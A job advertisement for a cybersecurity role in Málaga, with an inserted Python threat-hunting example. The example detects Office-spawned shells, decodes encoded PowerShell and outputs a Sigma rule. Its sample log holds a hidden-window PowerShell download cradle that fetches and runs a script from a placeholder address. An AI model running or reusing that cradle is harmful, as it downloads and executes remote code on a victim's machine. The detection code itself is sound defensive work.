
Cybersecurity Expert
- Málaga
- Permanent
- Full-time
- Security Monitoring & Operations:
- Monitor Security Information and Event Management (SIEM) dashboards and alerts to identify and analyze potential threats in real time.
- Perform in-depth analysis of suspicious activities, anomalies, and malware indicators; triage security events and escalate incidents as appropriate.
- Conduct regular vulnerability assessments and support penetration testing efforts to uncover security weaknesses, working with IT teams to remediate findings.
- Support patch management by tracking critical vulnerabilities and verifying that systems and applications are updated in a timely manner to reduce exposure.
- Incident Response:
- Investigate and contain cybersecurity incidents and breaches, coordinating evidence collection, digital forensic analysis (disk, memory, logs), and system recovery to minimize damage.
- Lead post-incident analysis to determine root causes and create incident reports with actionable recommendations to prevent recurrence.
- Develop and maintain incident response playbooks and procedures, ensuring they stay up-to-date with emerging threats and lessons learned from past events.
- Coordinate with IT infrastructure, development, and business teams during incident response to ensure effective communication and swift resolution of issues.
- Threat Hunting & Digital Forensics:
- Proactively hunt for threats in our networks and systems that evade automated defenses, analyzing security logs, network traffic, and endpoint data for signs of malicious activity.
- Develop hypotheses of potential attacker tactics (using frameworks like MITRE ATT&CK) and investigate those leads to uncover stealthy threats; create custom detection queries or scripts to support hunting operations.
- Perform deep-dive forensic analysis on digital evidence (such as malware samples, system images, memory dumps) to extract indicators of compromise and understand attack techniques.
- Continuously collaborate with the SOC team to integrate threat hunting findings into improved monitoring rules and to enhance overall incident detection capabilities.
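As an added illustration of the hypothesis-driven hunting described in this section (example code written for this page, not the employer's tooling): one hunt for an ATT&CK-derived hypothesis, "a phishing attachment (T1566.001) makes an Office application spawn a command interpreter (T1059.001 PowerShell / T1059.003 cmd)", run over constructed Sysmon-style process-creation events. The host names, command lines and the 192.0.2.10 payload URL are placeholders built for the example. The hunt decodes PowerShell `-EncodedCommand` payloads, extracts the URLs as indicators of compromise, and emits the matched condition as a Sigma-style rule that the SOC could turn into a monitoring rule.

```python
"""Hypothesis-driven hunt over process-creation logs (added example, not the employer's code).

Hypothesis (MITRE ATT&CK): a phishing attachment (T1566.001) causes an Office
application to spawn a command interpreter (T1059.001 PowerShell, T1059.003 cmd).
"""
import base64
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_TECHNIQUES = {"powershell.exe": "T1059.001", "pwsh.exe": "T1059.001", "cmd.exe": "T1059.003"}

# PowerShell's -EncodedCommand (and its abbreviations) takes base64 of the UTF-16LE script text.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\"]+")


def encode_command(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (Sysmon-style process creation, JSON lines); the hosts and
# the 192.0.2.10 URL are placeholders, not real data.
MALICIOUS_SCRIPT = "iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/payload.ps1')"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"host": "WS-0142", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {encode_command(MALICIOUS_SCRIPT)}"},
    {"host": "WS-0142", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"host": "WS-0207", "parent": "EXCEL.EXE", "image": "cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"host": "SRV-DB01", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
])


def parse_log(text: str) -> list[dict]:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed payload: still a hit for the hunt, just not decodable


def hunt_office_spawned_shell(events: list[dict]) -> list[dict]:
    """Apply the hypothesis to each event; return findings with decoded commands and URLs."""
    findings = []
    for ev in events:
        image = ev["image"].lower()
        if ev["parent"].lower() in OFFICE_PARENTS and image in SHELL_TECHNIQUES:
            decoded = decode_encoded_command(ev["cmdline"])
            findings.append({
                "host": ev["host"], "parent": ev["parent"], "image": ev["image"],
                "technique": SHELL_TECHNIQUES[image],
                "decoded_command": decoded,
                "urls": URL_RE.findall(decoded or ""),
            })
    return findings


def indicators(findings: list[dict]) -> list[str]:
    """Network indicators of compromise extracted from the findings."""
    return sorted({u for f in findings for u in f["urls"]})


def sigma_rule() -> dict:
    """The hunt condition as a Sigma-style rule for handover to the SOC's monitoring."""
    return {
        "title": "Office Application Spawning Command Interpreter",
        "tags": ["attack.t1566.001", "attack.t1059.001", "attack.t1059.003"],
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection": {
                "ParentImage|endswith": sorted("\\" + p for p in OFFICE_PARENTS),
                "Image|endswith": sorted("\\" + i for i in SHELL_TECHNIQUES),
            },
            "condition": "selection",
        },
        "level": "high",
    }


if __name__ == "__main__":
    hits = hunt_office_spawned_shell(parse_log(SAMPLE_LOG))
    for h in hits:
        print(h["host"], h["parent"], "->", h["image"], h["technique"], h["decoded_command"])
    print("IOCs:", indicators(hits))
    print(json.dumps(sigma_rule(), indent=2))
```

Two of the four constructed events match the hypothesis: the WINWORD.EXE-to-powershell.exe chain, whose encoded payload decodes to a download cradle pointing at the placeholder URL, and the EXCEL.EXE-to-cmd.exe reconnaissance; the scripted backup run from explorer.exe does not, which is the kind of benign-by-parent case a production rule also needs to exclude.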
- Security Architecture & Engineering:
- Collaborate with IT to design and implement security enhancements across our networks, cloud environments, and applications (e.g., improving network segmentation, hardening configurations, deploying new security tools).
- Evaluate new security technologies and tools (for example, advanced threat detection platforms or forensic tools), providing input on their potential value and overseeing pilot implementations.
- Education & Experience: Bachelor's degree in Computer Science, Information Security, or a related field. Approximately 3-5 years of hands-on experience in cybersecurity roles (e.g., SOC Analyst, Security Engineer, Incident Responder, Threat Hunter), or equivalent expertise.
- Technical Skills:
- SIEM and Monitoring: Solid experience with SIEM tools (such as Splunk, QRadar, or Microsoft Sentinel) and log analysis, including writing queries, interpreting events, and spotting anomalies across various log sources.
- Endpoint & Network Security: Strong knowledge of intrusion detection/prevention systems, endpoint protection/EDR solutions (e.g., Microsoft Defender for Endpoint, CrowdStrike), and firewall/network security technologies.
- Vulnerability Management: Experience conducting vulnerability assessments (using tools like Nessus, Qualys) and supporting penetration testing; good understanding of network and application security fundamentals to interpret findings and recommend fixes.
- Incident Response & Forensics: Proven incident response skills, including familiarity with digital forensics techniques (disk imaging, memory analysis) and malware analysis basics for investigating incidents. Able to follow incident management frameworks (e.g., NIST or SANS) and document findings clearly.
- Threat Hunting: Ability to proactively hunt for threats using SIEM and EDR data. Comfortable analyzing large datasets to identify patterns or indicators of compromise, and knowledgeable about threat hunting methodologies (hypothesis-driven investigations, use of threat intelligence).
- Security Architecture Understanding: Good grasp of security architecture principles - capable of assessing system designs for weaknesses and suggesting practical improvements. Familiarity with security frameworks and best practices (such as MITRE ATT&CK, CIS Controls) to guide enhancement efforts.
- Certifications: Certifications such as CISSP, GIAC (e.g., GCIH, GCFA, GCIA), CEH/OSCP, or other relevant credentials are a plus and will be considered favorably. These demonstrate a foundation of knowledge and a commitment to the field.
- A dynamic and collaborative environment where cybersecurity is a strategic priority
- A team that values creativity, initiative, and continuous improvement
- To support your work-life balance, we offer the option of mobile working
- We promote your professional and personal development through individual training and further education at the Drees & Sommer Academy
- We support your health with a bonus for sports enthusiasts and offer the possibility of subscribing to a private health insurance policy
- Tax advantages on commuting expenses to the office
- Tax advantages on meal expenses during working hours
- Employee referral program with an attractive bonus scheme
- Support for balancing career and family through tax benefits on kindergarten expenses